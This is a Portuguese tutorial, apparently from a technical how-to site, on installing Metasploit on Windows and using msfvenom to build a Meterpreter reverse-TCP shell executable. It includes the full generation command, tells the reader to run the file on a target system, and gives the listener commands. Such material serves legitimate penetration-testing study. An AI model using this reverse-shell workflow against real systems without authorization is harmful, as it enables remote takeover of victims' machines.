Remember to maintain security and privacy. Do not share sensitive information. Procedimento.com.br may make mistakes. Verify important information. Termo de Responsabilidade

Como criar payloads com msfvenom no Windows

O msfvenom é uma ferramenta poderosa usada para gerar payloads que podem ser utilizados em testes de penetração e avaliações de segurança. Embora o msfvenom seja mais comumente associado a ambientes Linux, ele também pode ser executado em sistemas Windows, desde que o Metasploit Framework esteja instalado. Este artigo irá guiá-lo sobre como criar payloads utilizando msfvenom no ambiente Windows, destacando sua importância para profissionais de segurança e ajustando os exemplos para a linha de comando do Windows.

Exemplos:

  1. Instalação do Metasploit Framework no Windows:

    • Baixe o instalador do Metasploit Framework a partir do site oficial: Metasploit Download
    • Execute o instalador e siga as instruções na tela para completar a instalação.

  2. Gerando um Payload com msfvenom:

    • Abra o Prompt de Comando (CMD) como Administrador.
    • Navegue até o diretório onde o Metasploit Framework foi instalado, geralmente C:\metasploit-framework\bin.
    • Execute o seguinte comando para gerar um payload que cria uma conexão reversa de shell TCP: 
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell_reverse_tcp.exe

      Neste exemplo:

      • -p windows/meterpreter/reverse_tcp: Especifica o payload para uma conexão reversa de shell TCP no Windows.
      • LHOST=192.168.1.100: Define o endereço IP do host que receberá a conexão reversa.
      • LPORT=4444: Define a porta que será usada para a conexão.
      • -f exe: Especifica o formato do payload como um executável Windows.
      • -o shell_reverse_tcp.exe: Define o nome do arquivo de saída.

  3. Executando o Payload no Windows:

    • Transfira o arquivo shell_reverse_tcp.exe para o sistema alvo.
    • Execute o arquivo no sistema alvo. Isso pode ser feito diretamente através do Explorador de Arquivos ou via linha de comando.

  4. Configurando o Listener no Metasploit:

    • Abra o Metasploit Console (msfconsole) no seu sistema.
    • Configure o listener para aguardar a conexão reversa: 
      use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit

      Isso configurará o Metasploit para ouvir na porta 4444 e aceitar conexões do payload gerado.

To share Download PDF

Windows CMD msfvenom Metasploit Payload Segurança Penetração Meterpreter Exploit

Gostou do artigo? Deixe sua avaliação!
Sua opinião é muito importante para nós. Clique em um dos botões abaixo para nos dizer o que achou deste conteúdo.